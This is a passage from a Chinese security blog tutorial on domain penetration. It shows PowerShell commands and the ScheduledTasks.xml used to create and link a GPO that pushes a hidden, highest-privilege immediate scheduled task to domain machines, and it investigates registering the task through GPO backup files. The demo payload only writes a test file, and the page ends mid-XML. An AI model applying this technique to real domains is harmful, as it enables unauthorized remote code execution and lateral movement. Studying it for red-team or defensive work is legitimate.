0x00 前言

在上篇文章 《域渗透――利用GPO中的计划任务实现远程执行》 介绍了利用GPO中的计划任务实现远程执行的方法,分析利用思路,通过命令行实现了GPO和计划任务的创建、修改和删除。

这篇文章将要详细介绍命令行实现的原理和脚本的开发细节,记录定位问题和解决问题的过程。

0x01 简介

本文将要介绍以下内容:

定位问题 解决思路

脚本实现细节

0x02 定位问题

测试环境:windows Server 2008 R2

domain:test.com

测试1:

通过Group Policy Management Console (GPMC) 创建GPO,添加计划任务(Immediate Task)。

成功实现计划任务的远程执行。

测试2:

使用命令行实现创建GPO并添加计划任务(Immediate Task),步骤如下:

1、创建一个GPO

new-gpo -name TestGPO1 | new-gplink -Target "dc=test,dc=com"

GpoId为d7dacd95-883c-402f-9238-9e2643f8f309,如下图:


域渗透――利用GPO中的计划任务实现远程执行(命令行实现原理与脚本细节)

2、创建计划任务的配置文件ScheduledTasks.xml

路径为:\\test.com\SYSVOL\test.com\Policies\{D7DACD95-883C-402F-9238-9E2643F8F309}\User\Preferences\ScheduledTasks

ScheduledTasks.xml的内容如下:

<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
<ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="debug" image="0" changed="2018-12-11 11:11:11" uid="{92272F3D-762C-460A-94FA-F3E3B9EBACF0}" userContext="0" removePolicy="0">
<Properties action="C" name="debug" runAs="%LogonDomain%\%LogonUser%" logonType="InteractiveToken">
<Task version="1.2">
<RegistrationInfo>
<Author>NT AUTHORITY\System</Author>
<Description/>
</RegistrationInfo>
<Principals>
<Principal id="Author">
<UserId>%LogonDomain%\%LogonUser%</UserId>
<LogonType>InteractiveToken</LogonType>
<RunLevel>HighestAvailable</RunLevel>
</Principal>
</Principals>
<Settings>
<IdleSettings>
<Duration>PT5M</Duration>
<WaitTimeout>PT1H</WaitTimeout>
<StopOnIdleEnd>false</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
<AllowHardTerminate>false</AllowHardTerminate>
<StartWhenAvailable>true</StartWhenAvailable>
<AllowStartOnDemand>false</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>true</Hidden>
<ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
<Priority>7</Priority>
<DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter>
</Settings>
<Triggers>
<TimeTrigger>
<StartBoundary>%LocalTimeXmlEx%</StartBoundary>
<EndBoundary>%LocalTimeXmlEx%</EndBoundary>
<Enabled>true</Enabled>
</TimeTrigger>
</Triggers>
<Actions>
<Exec>
<Command>powershell</Command>
<Arguments>-c "123 | Out-File C:\test\debug.txt"</Arguments>
</Exec>
</Actions>
</Task>
</Properties>
</ImmediateTaskV2>
</ScheduledTasks>

3、通过Group Policy Management Console (GPMC) 查看GPO的配置

如下图:


域渗透――利用GPO中的计划任务实现远程执行(命令行实现原理与脚本细节)

可以发现,只要创建文件ScheduledTasks.xml,就可以在Group Policy Management Console (GPMC)中的Scheduled Tasks显示添加的计划任务。

但是,此时并不能实现计划任务的远程执行

经过以下操作证明了还缺少计划任务的注册操作:

进入Group Policy Management Console (GPMC)中的Scheduled Tasks。

修改任意一项配置。

选择Apply。

如下图:


域渗透――利用GPO中的计划任务实现远程执行(命令行实现原理与脚本细节)

再次测试,发现创建的计划任务能够实现远程执行。

结论:

创建计划任务的配置文件ScheduledTasks.xml后,还需要注册操作才能使新添加的Scheduled Tasks生效。

0x03 解决思路

GPO支持的命令如下:

https://docs.microsoft.com/en-us/powershell/module/grouppolicy/?view=win10-ps

目前,我还没有找到关于注册计划任务的方法。

但我有一些猜测:

备份GPO的时候会不会保存注册信息?如果会,那么先备份GPO,向备份文件中添加注册信息,再还原GPO,能否变相实现GPO的注册?

开始接下来的测试:

1、备份GPO

Backup-Gpo -Name TestGPO1 -Path C:\test

如下图:


域渗透――利用GPO中的计划任务实现远程执行(命令行实现原理与脚本细节)

Id为28f36a77-298c-4b0a-a1c8-62832fd44cde,对应的文件夹为{28f36a77-298c-4b0a-a1c8-62832fd44cde}

文件夹中的内容如下图:


域渗透――利用GPO中的计划任务实现远程执行(命令行实现原理与脚本细节)

文件夹DomainSysvol中的内容同\\test.com\SYSVOL\test.com\Policies\{D7DACD95-883C-402F-9238-9E2643F8F309}中的内容保持一致。

猜测Backup.xml和gpreport.xml保存有计划任务的注册信息。

分别备份测试1和测试2的GPO,对比文件Backup.xml和gpreport.xml。

2、比较文件

文件存在差异,不同的地方就是计划任务的注册信息。

对于Backup.xml,不同的位置如下图:


域渗透――利用GPO中的计划任务实现远程执行(命令行实现原理与脚本细节)

标红的部分就是计划任务的注册信息。

对于gpreport.xml,不同的位置如下图:


域渗透――利用GPO中的计划任务实现远程执行(命令行实现原理与脚本细节)

标签<ExtensionData>保存注册信息(未注册不存在此标签),内容如下:

<ExtensionData>
<Extension xmlns:q1="http://www.microsoft.com/GroupPolicy/Settings/ScheduledTasks" xsi:type="q1:ScheduledTasksSettings">
<q1:ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
<q1:ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="debug" image="0" changed="2018-11-11 11:11:11" uid="{C30BC793-8944-4332-97FF-9FDFCAB1191A}" userContext="0" removePolicy="0"><q1:GPOSettingOrder>1</q1:GPOSettingOrder><q1:Properties action="C" name="debug" runAs="NT AUTHORITY\System" logonType="InteractiveToken"> <q1:Task version="1.2"> <q1:RegistrationInfo> <q1:Author>TEST\a</q1:Author> <q1:Description /> </q1:RegistrationInfo> <q1:Triggers> <q1:TimeTrigger> <q1:Enabled>true</q1:Enabled> <q1:StartBoundary>%LocalTimeXmlEx%</q1:StartBoundary> <q1:EndBoundary>%LocalTimeXmlEx%</q1:EndBoundary> </q1:TimeTrigger> </q1:Triggers> <q1:Settings> <q1:AllowStartOnDemand>false</q1:AllowStartOnDemand> <q1:DisallowStartIfOnBatteries>false</q1:DisallowStartIfOnBatteries> <q1:StopIfGoingOnBatteries>false</q1:StopIfGoingOnBatteries> <q1:AllowHardTerminate>false</q1:AllowHardTerminate> <q1:StartWhenAvailable>true</q1:StartWhenAvailable> <q1:Enabled>true</q1:Enabled> <q1:Hidden>true</q1:Hidden> <q1:DeleteExpiredTaskAfter>PT0S</q1:DeleteExpiredTaskAfter> <q1:MultipleInstancesPolicy>IgnoreNew</q1:MultipleInstancesPolicy> <q1:Priority>7</q1:Priority> <q1:ExecutionTimeLimit>PT0S</q1:ExecutionTimeLimit> <q1:IdleSettings> <q1:Duration>PT5M</q1:Duration> <q1:WaitTimeout>PT1H</q1:WaitTimeout> <q1:StopOnIdleEnd>false</q1:StopOnIdleEnd> <q1:RestartOnIdle>false</q1:RestartOnIdle>

本文系统(windows)相关术语:三级网络技术 计算机三级网络技术 网络技术基础 计算机网络技术

分页:12
转载请注明
本文标题:域渗透――利用GPO中的计划任务实现远程执行(命令行实现原理与脚本细节)
本站链接:https://www.codesec.net/view/628171.html


1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
技术大类 技术大类 | 系统(windows) | 评论(0) | 阅读(21)